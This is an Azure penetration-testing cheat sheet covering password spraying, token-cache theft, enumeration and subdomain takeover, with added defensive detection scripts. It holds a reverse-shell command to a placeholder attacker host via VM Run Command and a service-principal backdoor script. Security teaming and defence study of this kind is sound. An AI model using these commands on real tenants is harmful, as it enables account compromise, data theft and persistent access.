Pentest Book
Azure

Basic Info

**Tools**
https://github.com/dirkjanm/ROADtools
https://github.com/dafthack/PowerMeta
https://github.com/NetSPI/MicroBurst
https://github.com/nccgroup/ScoutSuite
https://github.com/hausec/PowerZure
https://github.com/fox-it/adconnectdump
https://github.com/FSecureLABS/Azurite
https://github.com/mburrough/pentestingazureapps
https://github.com/Azure/Stormspotter
https://github.com/nccgroup/azucar
https://github.com/dafthack/MSOLSpray
https://github.com/BloodHoundAD/BloodHound
https://github.com/nccgroup/Carnivore
https://github.com/CrowdStrike/CRT
https://github.com/Kyuu-Ji/Awesome-Azure-Pentest
https://github.com/cyberark/blobhunter

- Check if company is using Azure AD:
https://login.microsoftonline.com/[email protected]&xml=1
- If NameSpaceType is "Managed", the company uses Azure AD
- Enumerate Azure AD emails
https://github.com/LMGsec/o365creeper

Auth methods:
• Password Hash Synchronization
  ◇ Azure AD Connect
  ◇ On-prem service synchronizes hashed user credentials to Azure
  ◇ User can authenticate directly to Azure services like O365 with their internal domain credential
• Pass Through Authentication
  ◇ Credentials stored only on-prem
  ◇ On-prem agent validates authentication requests to Azure AD
  ◇ Allows SSO to other Azure apps without creds stored in cloud
• Active Directory Federation Services (ADFS)
  ◇ Credentials stored only on-prem
  ◇ Federated trust is set up between Azure and on-prem AD to validate auth requests to the cloud
  ◇ For password attacks you would have to auth to the on-prem ADFS portal instead of Azure endpoints
• Certificate-based auth
  ◇ Client certs for authentication to API
  ◇ Certificate management in legacy Azure Service Management (ASM) makes it impossible to know who created a cert (persistence potential)
  ◇ Service Principals can be set up with certs to auth
• Conditional access policies
• Long-term access tokens
  ◇ Authentication to Azure with OAuth tokens
  ◇ Desktop CLI tools that can be used to auth store access tokens on disk
  ◇ These tokens can be reused on other MS endpoints
  ◇ We have a lab on this later!
• Legacy authentication portals

Recon:
• O365 Usage
  ◇ https://login.microsoftonline.com/[email protected]&xml=1
  ◇ https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/[email protected]?Protocol=Autodiscoverv1
• User enumeration on Azure can be performed at
  https://login.Microsoft.com/common/oauth2/token
    ▪ This endpoint tells you if a user exists or not
  ◇ Detect invalid users while password spraying with:
    ▪ https://github.com/dafthack/MSOLSpray
  ◇ For on-prem OWA/EWS you can enumerate users with timing attacks (MailSniper)
• Auth 365 Recon:
  https://github.com/nyxgeek/o365recon

Microsoft Azure Storage:
• Microsoft Azure Storage is like Amazon S3
• Blob storage is for unstructured data
• Containers and blobs can be publicly accessible via access policies
• Predictable URLs at core.windows.net
  ◇ storage-account-name.blob.core.windows.net
  ◇ storage-account-name.file.core.windows.net
  ◇ storage-account-name.table.core.windows.net
  ◇ storage-account-name.queue.core.windows.net
• The “Blob” access policy means anyone can anonymously read blobs, but can’t list the blobs in the container
• The “Container” access policy allows for listing containers and blobs
• MicroBurst https://github.com/NetSPI/MicroBurst
  ◇ Invoke-EnumerateAzureBlobs
  ◇ Brute forces storage account names, containers, and files
  ◇ Uses permutations to discover storage accounts
PS> Invoke-EnumerateAzureBlobs -Base <base name>

Password Attacks
• Password Spraying Microsoft Online (Azure/O365)
• Can spray https://login.microsoftonline.com
--
POST /common/oauth2/token HTTP/1.1
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Host: login.microsoftonline.com
Content-Length: 195
Expect: 100-continue
Connection: close

resource=https%3A%2F%2Fgraph.windows.net&client_id=1b730954-1685-4b74-9bfd-dac224a7b894&client_info=1&grant_type=password&username=user%40targetdomain.com&password=Winter2020&scope=openid
--
• MSOLSpray https://github.com/dafthack/MSOLSpray
  ◇ The script logs:
    ▪ If a user cred is valid
    ▪ If MFA is enabled on the account
    ▪ If a tenant doesn't exist
    ▪ If a user doesn't exist
    ▪ If the account is locked
    ▪ If the account is disabled
    ▪ If the password is expired
  ◇ https://docs.microsoft.com/en-us/azure/active-directory/develop/reference-aadsts-error-codes

Password protections & Smart Lockout
• Azure Password Protection – Prevents users from picking passwords with certain words like seasons, company name, etc.
• Azure Smart Lockout – Locks out auth attempts whenever brute force or spray attempts are detected.
  ◇ Can be bypassed with FireProx + MSOLSpray
  ◇ https://github.com/ustayready/fireprox

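The defender's side of the spray and Smart Lockout notes above, as an added example that is not part of the original page: it groups failed sign-ins by time window instead of by source IP, because FireProx-style address rotation defeats per-IP counting, and it keys on the AADSTS codes for the outcomes MSOLSpray logs. The record layout, thresholds and sample events are constructed assumptions, not an Azure log schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# AADSTS result codes, as documented in the Microsoft error-code reference.
GUESS_FAILED = {50126, 50034}    # wrong password / user does not exist
PASSWORD_OK = {0, 50076, 50079}  # success, or password accepted and MFA demanded
LOCKED = 50053                   # account locked (Smart Lockout)

# Constructed sample (not real data): timestamp, user, source IP, result code.
SAMPLE_LOG = """\
2024-03-01T08:12:40Z,dana@example.com,198.51.100.7,50126
2024-03-01T08:12:55Z,dana@example.com,198.51.100.7,0
2024-03-01T09:00:05Z,alice@example.com,203.0.113.10,50126
2024-03-01T09:00:09Z,bob@example.com,203.0.113.44,50126
2024-03-01T09:00:14Z,carol@example.com,203.0.113.81,50076
2024-03-01T09:00:20Z,erin@example.com,203.0.113.12,50034
2024-03-01T09:00:26Z,frank@example.com,203.0.113.93,50126
2024-03-01T09:00:31Z,grace@example.com,203.0.113.27,50053
2024-03-01T09:00:37Z,heidi@example.com,203.0.113.65,50126
"""


def parse(log_text):
    """Turn 'timestamp,user,ip,code' lines into (datetime, user, ip, code) tuples."""
    events = []
    for line in log_text.strip().splitlines():
        ts, user, ip, code = (field.strip() for field in line.split(","))
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append((when, user.lower(), ip, int(code)))
    return events


def find_sprays(events, window=timedelta(minutes=30), min_users=5, max_per_user=3):
    """Flag fixed time windows in which many accounts each fail only a few times."""
    secs = int(window.total_seconds())
    buckets = defaultdict(list)
    for ev in events:
        # Key on time only: the source IP is deliberately not part of the key,
        # so rotating the source address does not split the spray into noise.
        buckets[int(ev[0].timestamp()) // secs].append(ev)

    findings = []
    for idx in sorted(buckets):
        per_user, per_ip = defaultdict(int), defaultdict(int)
        accepted, locked = set(), set()
        for _, user, ip, code in buckets[idx]:
            if code in GUESS_FAILED:
                per_user[user] += 1
                per_ip[ip] += 1
            elif code in PASSWORD_OK:
                accepted.add(user)
            elif code == LOCKED:
                locked.add(user)
        # Spray shape: many accounts, few guesses each. An account hammered
        # more than max_per_user times is brute force and is not counted here.
        sprayed = [u for u, n in per_user.items() if n <= max_per_user]
        if len(sprayed) < min_users:
            continue
        findings.append({
            "window_start": datetime.fromtimestamp(idx * secs, tz=timezone.utc),
            "failed_users": len(sprayed),
            "source_ips": len(per_ip),
            "max_failures_per_ip": max(per_ip.values()),
            # Includes legitimate sign-ins in the window; triage against known devices.
            "password_accepted": sorted(accepted),
            "locked": sorted(locked),
        })
    return findings


if __name__ == "__main__":
    for finding in find_sprays(parse(SAMPLE_LOG)):
        print(finding)
```

In the sample no single address fails more than once, so a per-IP threshold never fires, while the time-window view shows five accounts failing inside one window.
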
Phishing session hijack
• Evilginx2 and Modlishka
  ◇ MitM frameworks for harvesting creds/sessions
  ◇ Can also evade 2FA by riding user sessions
• With a hijacked session we need to move fast
• Session timeouts can limit access
• Persistence is necessary

Steal Access Tokens
• Azure config files:
  web.config
  app.config
  .cspkg
  .publishsettings
• Azure Cloud Service Packages (.cspkg)
• Deployment files created by Visual Studio
• Possible other Azure service integration (SQL, Storage, etc.)
• Look through cspkg zip files for creds/certs
• Search Visual Studio Publish directory
  \bin\debug\publish
• Azure Publish Settings files (.publishsettings)
  ◇ Designed to make it easier for developers to push code to Azure
  ◇ Can contain a Base64 encoded Management Certificate
  ◇ Sometimes cleartext credentials
  ◇ Open publishsettings file in text editor
  ◇ Save “ManagementCertificate” section into a new .pfx file
  ◇ There is no password for the pfx
  ◇ Search the user’s Downloads directory and VS projects
• Check %USERPROFILE%\.azure\ for auth tokens
• During an authenticated session with the Az PowerShell module a TokenCache.dat file gets generated in the %USERPROFILE%\.azure\ folder.
• Also search disk for other saved context files (.json)
• Multiple tokens can exist in the same context file

Post-Compromise
• What can we learn with a basic user?
• Subscription Info
• User Info
• Resource Groups
• Scavenging Runbooks for Creds
• Standard users can access Azure domain information, and this usually isn’t locked down
• Authenticated users can go to portal.azure.com and click Azure Active Directory
• O365 Global Address List has this info as well
• Even if portal is locked down PowerShell cmdlets will still likely work
• There is a company-wide setting that locks down the entire org from viewing Azure info via cmd line: Set-MsolCompanySettings -UsersPermissionToReadOtherUsersEnabled $false

Azure: CLI Access
• Azure Service Management (ASM or Azure “Classic”)
  ◇ Legacy and recommended to not use
• Azure Resource Manager (ARM)
  ◇ Added service principals, resource groups, and more
  ◇ Management Certs not supported
• PowerShell Modules
  ◇ Az, AzureAD & MSOnline
• Azure Cross-platform CLI Tools
  ◇ Linux and Windows client

Azure: Subscriptions
• Organizations can have multiple subscriptions
• A good first step is to determine what subscription you are in
• The subscription name is usually informative
• It might have “Prod”, or “Dev” in the title
• Multiple subscriptions can be under the same Azure AD directory (tenant)
• Each subscription can have multiple resource groups

Azure User Information
• Built-In Azure Subscription Roles
  ◇ Owner (full control over resource)
  ◇ Contributor (All rights except the ability to change permissions)
  ◇ Reader (can only read attributes)
  ◇ User Access Administrator (manage user access to Azure resources)
• Get the current user’s role assignment
PS> Get-AzRoleAssignment
• If the Azure portal is locked down it is still possible to access Azure AD user information via MSOnline cmdlets
• The below examples enumerate users and groups
PS> Import-Module MSOnline
PS> Connect-MsolService
Or
PS> $credential = Get-Credential
PS> Connect-MsolService -Credential $credential

PS> Get-MSolUser -All
PS> Get-MSolGroup -All
PS> Get-MSolGroupMember -GroupObjectId <GroupObjectId>
PS> Get-MSolCompanyInformation
• Pipe Get-MSolUser -All to format list to get all user attributes
PS> Get-MSolUser -All | fl

Azure Resource Groups
• Resource Groups collect various services for easier management
• Recon can help identify the relationships between services such as WebApps and SQL
PS> Get-AzResource
PS> Get-AzResourceGroup
PS> Get-AzStorageAccount

Azure: Runbooks
• Azure Runbooks automate various tasks in Azure
• Require an Automation Account and can contain sensitive information like passwords
PS> Get-AzAutomationAccount
PS> Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>
• Export a runbook with:
PS> Export-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName> -Name <RunbookName> -OutputFolder .\Desktop\

Azure VMs:
PS> Get-AzVM
PS> $vm = Get-AzVM -Name "VM Name"
PS> $vm.OSProfile
PS> Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1

Azure Virtual Networks:
PS> Get-AzVirtualNetwork
PS> Get-AzPublicIpAddress
PS> Get-AzExpressRouteCircuit
PS> Get-AzVpnConnection

# Quick 1-liner to search all Azure AD user attributes for passwords after auth'ing with Connect-MsolService:
$x=Get-MsolUser;foreach($u in $x){$p = @();$u|gm|%{$p+=$_.Name};ForEach($s in $p){if($u.$s -like "*password*"){Write("[*]"+$u.UserPrincipalName+"["+$s+"]"+" : "+$u.$s)}}}

# https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html

# Removing Azure services
- Under Azure Portal -> Resource Groups

# Interesting metadata instance urls:
http://169.254.169.254/metadata/v1/maintenance
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text

Traditional AD - Azure AD comparison

Basic Azure AD concepts and tips

- Source of authentication for Office 365, Azure Resource Manager, and anything else you integrate with it.

- PowerShell interaction:
  • MSOnline PowerShell module
    • Focuses on Office 365
    • Some Office 365 specific features
  • AzureAD PowerShell module
    • General Azure AD
    • Different feature set
  • Azure CLI / Az PowerShell module
    • More focus on Azure Resource Manager

- Azure AD principals
  • Users
  • Devices
  • Applications

- Azure AD roles
  • RBAC Roles are only used for Azure Resource Manager
  • Office 365 uses administrator roles exclusively

- Azure AD admin roles
  • Global/Company administrator can do anything
  • Limited administrator accounts
    • Application Administrator
    • Authentication Administrator
    • Exchange Administrator
    • Etc
  • Roles are fixed

- Azure AD applications
  • Documentation unclear
  • Terminology different between documentation, APIs and Azure portal
  • Complex permission system
  • Most confusing part
  • Examples:
    • Microsoft Graph
    • Azure Multi-Factor Auth Client
    • Azure Portal
    • Office 365 portal
    • Azure ATP
  • A default Office 365 Azure AD has about 200 service principals (read: applications)

- App permissions
  • Two types of privileges:
    • Delegated permissions
      • Require signed-in user present to utilize
    • Application permissions
      • Are assigned to the application, which can use them at any time
  • These privileges are assigned to the service principal
  • Every application defines permissions
  • Can be granted to Service Principals
  • Commonly used:
    • Microsoft Graph permissions
    • Azure AD Graph permissions

- Azure AD Sync Account
  • Dump all on-premises password hashes (if PHS is enabled)
  • Log in on the Azure portal (since it’s a user)
  • Bypass conditional access policies for admin accounts
  • Add credentials to service principals
  • Modify service principal properties

If password hash sync is in use:
Compromised Azure AD Connect Sync account = Compromised AD

• Encryption key is encrypted with DPAPI
• Decrypted version contains some blob with AES keys
• Uses AES-256 in CBC mode

Anyone with control over Service Principals can assign credentials to them and potentially escalate privileges.

Anyone who can edit properties* of the AZUREADSSOACC$ account can impersonate any user in Azure AD using Kerberos (if no MFA)

Azure attacks examples

# Password spraying
https://github.com/dafthack/MSOLSpray/MSOLSpray.ps1
Create a text file with ten (10) fake users we will spray along with your own user account ([email protected]). (Do not spray accounts you do not own. You may use my domain “glitchcloud.com” for generating fake target users) and save as userlist.txt

Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password [the password you set for your test account]

# Access Token

PS> Import-Module Az
PS> Connect-AzAccount
or
PS> $credential = Get-Credential
PS> Connect-AzAccount -Credential $credential

PS> mkdir C:\Temp
PS> Save-AzContext -Path C:\Temp\AzureAccessToken.json
PS> mkdir "C:\Temp\Live Tokens"

# Auth
Connect-AzAccount
## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-AzAccount -Credential $credential

Open Windows Explorer and type %USERPROFILE%\.Azure\ and hit enter
• Copy TokenCache.dat & AzureRmContext.json to C:\Temp\Live Tokens
• Now close your authenticated PowerShell window!

Delete everything in %USERPROFILE%\.azure\
• Start a brand new PowerShell window and run:
PS> Import-Module Az
PS> Get-AzContext -ListAvailable
• You shouldn’t see any available contexts currently

• In your PowerShell window let’s manipulate the stolen TokenCache.dat and AzureRmContext.json files so we can import them into our PowerShell session

PS> $bytes = Get-Content "C:\Temp\Live Tokens\TokenCache.dat" -Encoding byte
PS> $b64 = [Convert]::ToBase64String($bytes)
PS> Add-Content "C:\Temp\Live Tokens\b64-token.txt" $b64

• Now let’s add the b64-token.txt to the AzureRmContext.json file.
• Open the C:\Temp\Live Tokens folder.
• Open the AzureRmContext.json file in Notepad and find the line near the end of the file titled “CacheData”. It should be null.
• Delete the word “null” on this line
• Where “null” was add two quotation marks (“”) and then paste the contents of b64-token.txt in between them.
• Save this file as C:\Temp\Live Tokens\StolenToken.json
• Let’s import the new token

PS> Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'

• We are now operating in an authenticated session to Azure

PS> $context = Get-AzContext
PS> $context.Account

• You can import the previously exported context (AzureAccessToken.json) the same way

# Azure situational awareness
• GOAL: Use the MSOnline and Az PowerShell modules to do basic enumeration of an Azure account post-compromise.
• In this lab you will authenticate to Azure using the Azure AD account you set up. Then, you will import the MSOnline and Az PowerShell modules and try out some of the various modules that assist in enumerating Azure resource usage.

• Start a new PowerShell window and import both the MSOnline and Az modules
PS> Import-Module MSOnline
PS> Import-Module Az
• Authenticate to each service with your Azure AD account:
PS> Connect-AzAccount
PS> Connect-MsolService
• First get some basic Azure information
PS> Get-MSolCompanyInformation
• Some interesting items here are
  ◇ UsersPermissionToReadOtherUsersEnabled
  ◇ DirSyncServiceAccount
  ◇ PasswordSynchronizationEnabled
  ◇ Address/phone/emails
• Next, we will start looking at the subscriptions associated with the account as well as look at the current context we are operating in. Look at the “Name” of the subscription and context for possible indication as to what it is associated with.
PS> Get-AzSubscription
PS> $context = Get-AzContext
PS> $context.Name
PS> $context.Account
• Enumerating the roles assigned to your user will help identify what permissions you might have on the subscription as well as who to target for escalation.
PS> Get-AzRoleAssignment
• List out the users on the subscription. This is the equivalent of “net users /domain” in on-prem AD
PS> Get-MSolUser -All
PS> Get-AzAdApplication
PS> Get-AzWebApp
PS> Get-AzSQLServer
PS> Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName
PS> Get-AzSqlServerFirewallRule -ServerName $ServerName -ResourceGroupName $ResourceGroupName
PS> Get-AzSqlServerActiveDirectoryAdministrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName
• The user you set up likely doesn’t have any resources currently associated with it, but these commands will help to understand the specific resources a user you gain access to has.
PS> Get-AzResource
PS> Get-AzResourceGroup
• Choose a subscription
PS> Select-AzSubscription -SubscriptionID "SubscriptionID"
• There are many other functions.
• Use Get-Module to list out the other Az module groups
• To list out functions available within each module use the below command substituting the value of the “Name” parameter.
PS> Get-Module -Name Az.Accounts | Select-Object -ExpandProperty ExportedCommands
PS> Get-Module -Name MSOnline | Select-Object -ExpandProperty ExportedCommands

Azure Block Blobs (S3 equivalent) attacks

# Discovering with Google Dorks
site:*.blob.core.windows.net
site:*.blob.core.windows.net ext:xlsx | ext:csv "password"
# Discovering with DNS enumeration
python dnscan.py -d blob.core.windows.net -w subdomains-100.txt

# When you find one, try it with curl; an empty container responds with 400

# List containers
az storage container list --connection-string '<connection string>'
# List blobs in containers
az storage blob list --container-name <container name> --connection-string '<connection string>'
# Download blob from container
az storage blob download --container-name <container name> --name <file> --file /tmp/<file> --connection-string '<connection string>'

Azure subdomain takeovers

# Azure CloudApp: cloudapp.net
1. Check CNAME with dig pointing to cloudapp.net
2. Go to https://portal.azure.com/?quickstart=True#create/Microsoft.CloudService
3. Register the unclaimed domain the CNAME is pointing to

# Azure Websites: azurewebsites.net
1. Check CNAME with dig pointing to azurewebsites.net
2. Go to https://portal.azure.com/#create/Microsoft.WebSite
3. Register the unclaimed domain the CNAME is pointing to
4. Register domain on the Custom domains section of the dashboard

# Azure VM: cloudapp.azure.com
1. Check CNAME with dig pointing to *.region.cloudapp.azure.com
2. Register a new VM in the same region with size Standard_B1ls (cheapest) with 80 and 443 open
3. Go to Configuration and set the domain name the CNAME is pointing to

Other Azure Services

# Azure App Services Subdomain Takeover
- For target example.com you found users.example.com
- Go to https://users.galaxybutter.com and get an error
- dig CNAME users.galaxybutter.com and get an Azure App Service that was probably deprecated or removed
- Create an App Service and point it to the missing CNAME
- Add a custom domain to the App Service
- Show custom content

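The takeover notes above (the cloudapp.net, azurewebsites.net and cloudapp.azure.com cases and the App Services case) all start from a CNAME that still points at a released Azure name. This added example, which is not part of the original page, audits an organization's own zone export for such records; the zone data, the stub resolver set and all function names are constructed assumptions.

```python
import socket

# Azure-hosted suffixes named in the takeover notes, with the service behind each.
AZURE_SUFFIXES = {
    "cloudapp.net": "Cloud Services",
    "azurewebsites.net": "App Service (Websites)",
    "cloudapp.azure.com": "Virtual Machines",
}

# Constructed zone export (not real hosts): (record name, CNAME target).
SAMPLE_ZONE = [
    ("www.example.com", "example-prod.azurewebsites.net."),
    ("users.example.com", "example-users-old.azurewebsites.net"),
    ("legacy.example.com", "EXAMPLE-legacy.CloudApp.net"),
    ("vpn.example.com", "example-vpn.westeurope.cloudapp.azure.com"),
    ("blog.example.com", "example.notcloudapp.net"),
    ("shop.example.com", "shops.example-cdn.test"),
]
# Constructed stand-in for DNS: the only targets that still resolve.
SAMPLE_LIVE = {
    "example-prod.azurewebsites.net",
    "example-vpn.westeurope.cloudapp.azure.com",
}


def normalize(target):
    """Lower-case a CNAME target and drop the trailing root dot."""
    return target.strip().rstrip(".").lower()


def azure_service(target):
    """Return the Azure service a target belongs to, or None if it is not Azure."""
    host = normalize(target)
    for suffix, service in AZURE_SUFFIXES.items():
        # Match on a label boundary so 'x.notcloudapp.net' is not mistaken for Azure.
        if host.endswith("." + suffix):
            return service
    return None


def system_resolves(host):
    """Default check: True if the host currently resolves to an address."""
    try:
        socket.getaddrinfo(host, None)
        return True
    except socket.gaierror:
        return False


def audit_zone(records, resolves=system_resolves):
    """List CNAMEs that point at an Azure name which no longer resolves."""
    findings = []
    for name, target in records:
        service = azure_service(target)
        if service and not resolves(normalize(target)):
            findings.append(
                {"record": name, "target": normalize(target), "service": service}
            )
    return findings


if __name__ == "__main__":
    # The stub resolver keeps the demo offline; drop the argument to use real DNS.
    for f in audit_zone(SAMPLE_ZONE, resolves=lambda host: host in SAMPLE_LIVE):
        print(f"{f['record']} -> {f['target']} ({f['service']}): remove or re-claim")
```

A flagged record is a candidate for review: delete the CNAME, or re-create the Azure resource under the same name before anyone else can.
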
# Azure Run Command
# Feature that allows you to execute commands without requiring SSH or SMB/RDP access to a machine. This is very similar to AWS SSM.
az login
az login --use-device-code #Login
az group list #List groups
az vm list -g GROUP-NAME #List VMs inside group
#Linux VM
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "id"
#Windows VM
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunPowerShellScript --scripts "whoami"
# Linux Reverse Shell Azure Command
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "bash -c \"bash -i >& /dev/tcp/ATTACKER-EXTERNAL-IP/9090 0>&1\""

# Azure SQL Databases
- MSSQL syntax
- Dorks: "database.windows.net" site:pastebin.com

# Azure AD commands
az ad sp list --all
az ad app list --all

# Azure metadata service
http://169.254.169.254/metadata/instance
https://github.com/microsoft/azureimds

Create Azure service principal as backdoor

$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$spn
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$UnsecureSecret
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
#Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant "tenant ID" -ServicePrincipal
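
What the sequence above leaves behind for a defender, as an added example that is not part of the original page: it replays audit events in time order and flags a service principal that receives a privileged role shortly after being created or re-keyed, or that receives new credentials while already holding one. The activity names are the ones used by the Azure AD audit log and the Azure Activity Log; the flat event layout, the 24-hour window and every account name except the page's "WebService" are constructed assumptions.

```python
from datetime import datetime, timedelta

PRIVILEGED_ROLES = {"company administrator", "global administrator", "owner"}
# Principal created, or a new secret/certificate added to it.
KEYED = {"Add service principal", "Add service principal credentials"}
# Directory role membership (audit log) or Azure RBAC assignment (Activity Log).
ROLE_GRANT = {"Add member to role", "Microsoft.Authorization/roleAssignments/write"}

# Constructed, simplified events (not a real log schema):
# (time, activity, actor, service principal, role granted or None)
SAMPLE_EVENTS = [
    ("2024-02-01 09:00", "Add service principal", "ops@example.com", "report-app", None),
    ("2024-03-01 10:02", "Add service principal", "j.doe@example.com", "WebService", None),
    ("2024-03-01 10:02", "Microsoft.Authorization/roleAssignments/write",
     "j.doe@example.com", "WebService", "Owner"),
    ("2024-03-01 10:09", "Add member to role", "j.doe@example.com", "WebService",
     "Company Administrator"),
    ("2024-03-02 14:30", "Add service principal credentials", "ci-admin@example.com",
     "build-agent", None),
    ("2024-03-05 09:00", "Add member to role", "ops@example.com", "backup-sync",
     "Directory Readers"),
    ("2024-03-06 11:00", "Add member to role", "ops@example.com", "report-app",
     "Global Administrator"),
    ("2024-03-07 08:00", "Add service principal credentials", "intern@example.com",
     "report-app", None),
]


def _when(stamp):
    return datetime.strptime(stamp, "%Y-%m-%d %H:%M")


def review_service_principals(events, window=timedelta(hours=24)):
    """Return findings for privileged role grants and re-keying of privileged principals."""
    last_keyed = {}   # principal -> time it was created or last given credentials
    privileged = {}   # principal -> privileged roles seen so far
    findings = []
    # sorted() is stable, so events with equal timestamps keep their log order.
    for stamp, activity, actor, principal, role in sorted(events, key=lambda e: _when(e[0])):
        when = _when(stamp)
        if activity in KEYED:
            if principal in privileged:
                held = ", ".join(sorted(privileged[principal]))
                findings.append({"time": stamp, "actor": actor, "principal": principal,
                                 "severity": "high",
                                 "reason": "credential added to principal holding " + held})
            last_keyed[principal] = when
        elif activity in ROLE_GRANT and role and role.lower() in PRIVILEGED_ROLES:
            recent = principal in last_keyed and when - last_keyed[principal] <= window
            findings.append({"time": stamp, "actor": actor, "principal": principal,
                             "severity": "high" if recent else "medium",
                             "reason": role + (" granted to new or re-keyed principal"
                                               if recent else " granted to existing principal")})
            privileged.setdefault(principal, set()).add(role)
    return findings


if __name__ == "__main__":
    for finding in review_service_principals(SAMPLE_EVENTS):
        print(finding)
```
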

Azure password reset

Azure Services Summary

Base services

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| Virtual Machines | Servers | Move existing apps to the cloud without changing them. You manage the entire computer. | EC2 |
| Cloud Services | Managed Virtual Machines | Run applications on virtual machines that you don't have to manage, but can partially manage. | |
| Batch | Azure Distributed Processing | Work on a large chunk of data by divvying it up between a whole bunch of machines. | |
| RemoteApp | Remote Desktop for Apps | Expose non-web apps to users. For example, run Excel on your iPad. | AppStream |
| Web Apps | Web Site Host | Run websites (.NET, Node.js, etc.) without managing anything extra. Scale automatically and easily. | Elastic Beanstalk |
| Mobile Apps | Mobile App Accelerator | Quickly get an app backend up and running. | |
| Logic Apps | Visio for Doing Stuff | Chain steps together to get stuff done. | |
| API Apps | API Host | Host your API's without any of the management overhead. | |
| API Management | API Proxy | Expose an API and off-load things like billing, authentication, and caching. | API Gateway |

Mobile

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| Notification Hubs | Notification Blaster | Send notifications to all of your users, or groups of users based on things like zip code. All platforms. | SNS |
| Mobile Engagement | Mobile Psychic | Track what users are doing in your app, and customize experience based on this data. | |

Storage

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| SQL Database | Azure SQL | Use the power of a SQL Server cluster without having to manage it. | RDS |
| Document DB | Azure NoSQL | Use an unstructured JSON database without having to manage it. | Dynamo DB |
| Redis Cache | Easy Cache | Cache files in memory in a scalable way. | Elasticache |
| Storage Blobs | Cloud File System | Store files, virtual disks, and build other storage services on top of. | S3 |
| Azure Search | Index & Search | Add search capabilities to your website, or index data stored somewhere else. | CloudSearch |
| SQL Data Warehouse | Structured Report Database | Store all of your company's data in a structured format for reporting. | RedShift |
| Azure Data Lake | Unstructured Report Database | Store all of your company's data in any format for reporting. | |
| HDInsight | Hosted Hadoop | Do Hadoopy things with massive amounts of data. | |
| Machine Learning | Skynet | Train AI to predict the future using existing data. Examples include credit card fraud detection and Netflix movie recommendations. | |
| Stream Analytics | Real-time data query | Look for patterns in data as it arrives. | |
| Data Factory | Azure ETL | Orchestrate extract, transform, and load data processes. | Data Pipeline |
| Event Hubs | IoT Ingestor | Ingest data at ANY scale inexpensively. | |

Networking

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| Virtual Network | Private Network | Put machines on the same, private network so that they talk to each other directly and privately. Expose services to the internet as needed. | |
| ExpressRoute | Fiber to Azure | Connect privately over an insanely fast pipe to an Azure datacenter. Make your local network part of your Azure network. | Direct Connect |
| Load Balancer | Load Balancer | Split load between multiple services, and handle failures. | |
| Traffic Manager | Datacenter Load Balancer | Split load between multiple datacenters, and handle datacenter outages. | |
| DNS | DNS Provider | Run a DNS server so that your domain names map to the correct IP addresses. | Route53 |
| VPN Gateway | Virtual Fiber to Azure | Connect privately to an Azure datacenter. Make your local network part of your Azure network. | |
| Application Gateway | Web Site Proxy | Proxy all of your HTTP traffic. Host your SSL certs. Load balance with sticky sessions. | |
| CDN | CDN | Make your sites faster and more scalable by putting your static files on servers around the world close to your end users. | Cloudfront |
| Media Services | Video Processor | Transcode video and distribute and manage it on the scale of the Olympics. | Elastic Transcoder |

Management

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| Azure Resource Manager | Declarative Configuration | Define your entire Azure architecture as a repeatable JSON file and deploy all at once. | CloudFormation |

Developer

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| Application Insights | App Analytics | View detailed information about how your apps (web, mobile, etc.) are used. | Mobile Analytics |
| Service Fabric | Cloud App Framework | Build a cloud optimized application that can scale and handle failures inexpensively. | |